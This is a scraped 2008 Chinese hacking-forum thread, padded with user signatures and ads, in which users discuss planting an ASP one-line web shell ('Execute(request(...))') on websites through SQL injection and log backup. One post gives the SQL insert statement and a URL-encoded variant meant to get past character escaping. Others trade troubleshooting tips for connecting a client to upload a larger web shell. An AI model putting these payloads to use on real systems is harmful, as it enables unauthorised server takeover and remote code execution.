12
返回列表 发帖
阿豪

Rank: 1

帖子
35 
积分
52 
威望
68  
金钱
68  
在线时间
0 小时 
5 跳转到 »
发表于 2008-7-21 00:14 | 只看该作者
楼猪参考下这个 http://hack520.77169.com/archives/2005/29382.html

一样的道理,log 备份也一样

insert into cmd (a) values (&#39;<%Execute(request("l"))%>&#39;)-- 改为
insert into cmd (a) values (&#39;<%25Execute(request("l"))%25>&#39;)--Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男 在线时间576 小时 注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料引用 报告 回复 TOP

十二少
荣誉会员

TOP

brabrabra

Rank: 1

帖子
22 
积分
33 
威望
44  
金钱
44  
在线时间
0 小时 
4
发表于 2008-7-21 00:14 | 只看该作者
<%Execute(request("l"))% 这个一句话的不好使啊

  我测试了N次都没成功,手工,傻瓜工具都试了,成功插入这个后门,就是不能用客户端写入大马
  
  不是什么权限的问题,以前用KKER写的那个ASP的数据库生成马的ASP客户端成功过一次。Welcome to Http://Www.TwelveS.Cn
帖子126 精华0 积分3414 阅读权限100 性别男 在线时间115 小时 注册时间2005-1-8 最后登录2008-5-15 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

heroooooo
荣誉会员

TOP

枝囡

Rank: 2

帖子
43 
积分
63 
威望
82  
金钱
77  
在线时间
0 小时 
3
发表于 2008-7-21 00:14 | 只看该作者
一般写入成功后在最下面会有像SQL注入时的提示,VB那控件错误什么的,还有你在用NB的CMD写马的时候要注意转义的问题!有些符号会被转义掉!比如%>!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

free2ndfree
晶莹剔透§烈日灼然

TOP

fulu

Rank: 1

帖子
24 
积分
35 
威望
46  
金钱
44  
在线时间
0 小时 
2
发表于 2008-7-21 00:14 | 只看该作者
3楼的兄弟!我是用IE直接提交的!

等吧!等等高手来!哎!
帖子28 精华2 积分104 阅读权限40 性别男 在线时间18 小时 注册时间2006-3-22 最后登录2008-6-8 查看详细资料引用 报告 回复 TOP 赚更多的钱

hack520
运维管理组

TOP

12
返回列表